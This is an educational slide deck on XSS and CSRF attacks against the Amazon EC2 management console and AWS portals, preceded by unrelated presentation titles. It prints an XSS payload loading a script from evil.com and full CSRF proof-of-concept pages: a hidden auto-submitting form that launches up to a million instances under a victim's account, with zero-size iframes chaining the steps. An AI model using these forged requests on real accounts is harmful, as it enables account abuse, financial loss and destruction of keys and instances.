Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 

Cloud Insecurity

  • 2. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 3. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 4. Recalls • XSS (Cross-Site Scripting) vulnerability allows an attacker to use a website to transmit an attack (the website becomes the vector through which attackers reach their victims). • XSS is today’s most widely reported software vulnerability.
  • 5. Recalls • XSS, a simple example: <c:if test=“${param.sayHello}”> Server-Side JSP Hello ${param.name}! </c:if> Evil parameter: %3Cscript%20src%3D%22Dhttp%3A//evil.com/evil.js%22%3E%3C /script%3E Result: Hello <script src=“http://evil.com/evil.js”></script>
  • 6. Recalls • CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. • CSRF tricks the victim into loading a page that contains a malicious request.
  • 7. Recalls • CSRF, a simple example: ... <img src=“http://truste Trusted blog (i.e. MySpace) dblog.com/addfrien d.php?id=12345”/> ... Active session User Evil Site
  • 8. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 9. Attacks against EC2 • The Amazon EC2 cloud is managed via web services and web interface consoles. • The web management console asks the user to provide her Amazon.com username and password. • The login page is hosted on the Amazon.com domain, making it susceptible to web application vulnerabilities found anywhere on the domain.
  • 10. Attacks against EC2 • Once an attacker gains access to the EC2 user’s session, the Amazon web management console offers a wealth of information related to the victim’s EC2 instances (X.509 certificates, secret tokens, ...).
  • 11. Attacks against EC2 • If the attacker discovers an XSS vulnerability anywhere on the Amazon.com domain, he can use a simple JavaScript payload to steal the EC2 user’s Access Key ID and Secret Access Key.
  • 12. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 13. Amazon EC2 real vulnerabilities • The security of AMI instances depends on the web management console for security. • Several portions of Amazon’s web management console were vulnerable to cross-site request forgery (CSRF) attacks.
  • 14. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 15. Web management console vulnerabilities • The first allows the attacker to start an arbitrary AMI instance using the victim’s EC2 account. • Two parts: – Initialize an evil AMI; – Launch the instance under the victim’s EC2 account.
• 16. Web management console vulnerabilities
  initialize.html:
    <html>
    <body>
    <img src="https://console.aws.amazon.com/ec2/_launchWizardForm.jsp?action.ImageId=ami-00031337&architecture=i386&image_icon=%2Fimages%2Flogo_windows.gif&image_title=Basic%20Microsoft%20Windows%20Server%202003&selected_language=undefined&groupName=Webserver&keyName=undefined">
    </body>
    </html>
• 17. Web management console vulnerabilities
  initialize.html (annotated): the <img> is a cross-domain image tag, so the victim’s browser issues the GET to the console with her authenticated session.
• 18. Web management console vulnerabilities
  launch.html:
    <html>
    <body>
    <form action="https://console.aws.amazon.com/ec2/runInstancesJson?" id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST">
      <input type="hidden" name="action.MinCount" value="1" />
      <input type="hidden" name="action.InstanceType" value="m1.small" />
      <input type="hidden" name="action.SecurityGroup" value="default" />
      <input type="hidden" name="action.SecurityGroup" value="Webserver" />
      <input type="hidden" name="action.MaxCount" value="1000000" />
      <input type="hidden" name="action.ImageId" value="ami-00031337" />
      <input type="hidden" name="mbtc" value="50084" />
      <input type="hidden" name="region" value="us-east-1" />
    </form>
    <script>
      setTimeout("document.LaunchEvilAMI.submit()", 5000);
    </script>
    </body>
    </html>
  • 19. Web management console vulnerabilities
• 20. Web management console vulnerabilities
  Merge:
    <html>
    <body>
    <iframe src="./initialize.html" height="0" width="0"></iframe>
    <iframe src="./launch.html" height="0" width="0"></iframe>
    </body>
    </html>
• 21. Web management console vulnerabilities
  Merge (annotated): both pages are loaded in zero-sized iframes, so the browser will not display the reply of the web server.
  • 22. Web management console vulnerabilities • The second vulnerability terminates arbitrary AMIs being run by the victim. • After the attack is launched, the victim can see that the instance was terminated without her consent.
  • 23. Web management console vulnerabilities • The last vulnerability involves the deletion of AMI key pairs. • Using a CSRF vulnerability, an attacker has the ability to delete arbitrary key pairs from a victim’s EC2 session. If the key pair is deleted, and the user has not properly backed up the key pair, he will have lost access to his own AMIs!
• 25. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are: – a username/password combination; – an Access Key ID/Secret Access Key combination; – X.509 certificates.
  • 27. AWS portals vulnerabilities • The first attack against AWS generates a new access key for the EC2 user’s session. • Access keys are used to authenticate a user to AWS, which is used to administer and manage the various AMIs running in a user’s account. • The attacker can create a temporary denial of service as the administrator must now update all the applications utilizing access key authentication to use the newly generated key.
  • 28. AWS portals vulnerabilities • This next attack forcibly deletes any X.509 certificates previously generated by the EC2 user. • Once the X.509 certificates are deleted, any application that relied on X.509 certificate authentication must be redeployed with the newly generated certificates.
  • 30. Conclusions • Cloud Computing allows organizations to focus on their core business while ensuring that their IT infrastructures are flexible enough to meet the demands of current and future users. • But it does not magically protect application logic from abuse or prevent attacks against the application level.
• 31. Conclusions • Uploading the most hardened virtual machine will not prevent attacks against the web-based management consoles that are used to administer the virtual machines. • Cloud providers must fix their security bugs and perform continuous code review.
• 32. References • Hacking: The Next Generation. Nitesh Dhanjani, Billy Rios, and Brett Hardin. O’Reilly, 2009. • Hacking Exposed: Web 2.0. Rich Cannings, Himanshu Dwivedi, Zane Lackey. McGraw-Hill, 2008. • Secure Programming with Static Analysis. Brian Chess, Jacob West. Addison-Wesley, 2007.